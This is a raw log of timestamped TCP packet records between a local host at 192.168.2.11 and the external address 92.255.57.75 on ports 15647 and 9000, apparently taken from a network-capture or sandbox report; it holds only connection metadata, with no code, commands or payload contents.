Dec 17, 2024 08:40:25.544614077 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.545205116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.545270920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.545311928 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.577450991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.577521086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.578479052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.578586102 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.578711987 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.582703114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.582787991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.582823038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.594557047 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.594662905 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.605899096 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.605998039 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.609415054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.609468937 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.609508991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.613830090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.613908052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.613933086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.615685940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.624622107 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.624706984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.628772020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.628810883 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.628815889 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.647545099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.647624016 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.650868893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.650909901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.650918961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.656776905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.656822920 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.683641911 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.683702946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.683706999 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.696609974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.696676970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.698329926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.714654922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.714705944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.724240065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.733706951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.733927965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.733978987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.733979940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.748579979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.748784065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.748842955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.748867035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.770638943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.770689964 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.774662018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.790882111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.790966988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.791050911 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.807894945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.810405970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.834471941 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.838109970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.840162992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.840176105 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.840368032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.856848001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.856885910 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.856915951 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.875509024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.875669956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.889550924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.889597893 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.894716978 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.894757986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.895781040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.895837069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.895878077 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.918076992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.918087959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.918162107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.940844059 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.960016966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.960163116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.968055010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.968148947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.968168974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.968372107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.970467091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.970531940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:25.991393089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:25.991462946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.009499073 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.009558916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.032561064 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.055711985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.061430931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.061487913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.079912901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.083858967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.088006020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.088088036 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.089173079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.089262009 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.102989912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.103060961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.122597933 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.129242897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.131843090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.150314093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.152406931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.152514935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.174248934 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.175544977 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.179841042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.200125933 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.203648090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.204828978 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.207777977 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.208055973 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.222878933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.226433039 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.242430925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.247170925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.268416882 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.272352934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.275908947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.293682098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.293730974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.293929100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.295237064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.295293093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.313730955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.319833040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.321850061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.324507952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.324579954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.345521927 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.346224070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.351547003 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.366909981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.367791891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.367911100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.388411999 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.390810013 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.395898104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.396009922 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.415107965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.415118933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.415245056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.433532000 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.433640003 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.444299936 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.445486069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.445561886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.445597887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.465403080 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.467839956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.476624012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.476663113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.476696968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.476736069 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.479003906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.479119062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.497208118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.497262001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.497281075 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.509690046 CET	9000	50054	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.509840012 CET	9000	50054	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.509896040 CET	50054	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.509896040 CET	50054	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.510735989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.510922909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.512104034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.512178898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.534146070 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.534655094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.534713030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.534725904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.553328037 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.553395987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.558989048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.559053898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.559075117 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.580534935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.580647945 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.596467018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.596600056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.597117901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.597182989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.597222090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.597724915 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.613339901 CET	50055	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.616242886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.616328001 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.616339922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.625730038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.626070023 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.629628897 CET	9000	50054	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.631910086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.631962061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.641036034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.641115904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.641123056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.654037952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.654159069 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.657763004 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.657823086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.678709984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.678787947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.679589987 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.679641962 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.679670095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.679722071 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.687114000 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.687199116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.687232018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.713659048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.713733912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.713741064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.726608038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.726679087 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.733108044 CET	9000	50055	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.733262062 CET	50055	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.733403921 CET	50055	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.745728970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.745740891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.745795965 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.751688957 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.757534981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.757735014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.762464046 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.762566090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.762587070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.762743950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.764863014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.764914989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.777803898 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.777966022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.788589954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.788629055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.788760900 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.807018995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.808295012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.808434010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.809103966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.809118032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.809190035 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.827831030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.832787991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.832858086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.832930088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.846579075 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.846646070 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.853131056 CET	9000	50055	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.861416101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.861480951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.861505032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.861540079 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.879057884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.879157066 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.892604113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.892723083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.908663988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.908845901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.908914089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.909008980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.929030895 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.929136038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.937943935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.938060045 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.947736025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.947798014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.953757048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.953819036 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.953826904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.955188990 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.955240011 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.981326103 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.981420994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.992208958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.992265940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:26.992341995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.999259949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:26.999325991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.000348091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.000385046 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.000483036 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.000515938 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.024694920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.024765015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.033039093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.033050060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.033123970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.053623915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.053730011 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.067586899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.069899082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.077042103 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.077236891 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.107568979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.107600927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.107814074 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.140006065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.141354084 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.152910948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.154009104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.158673048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.161916971 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.189793110 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.191694975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.204787970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.204935074 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.225111008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.225960970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.241241932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.241287947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.241524935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.261356115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.269911051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.270071030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.270152092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.272146940 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.281694889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.293612957 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.294888973 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.324739933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.336915970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.336980104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.337101936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.345169067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.345258951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.345325947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.346581936 CET	15647	50034	92.255.57.75	192.168.2.11
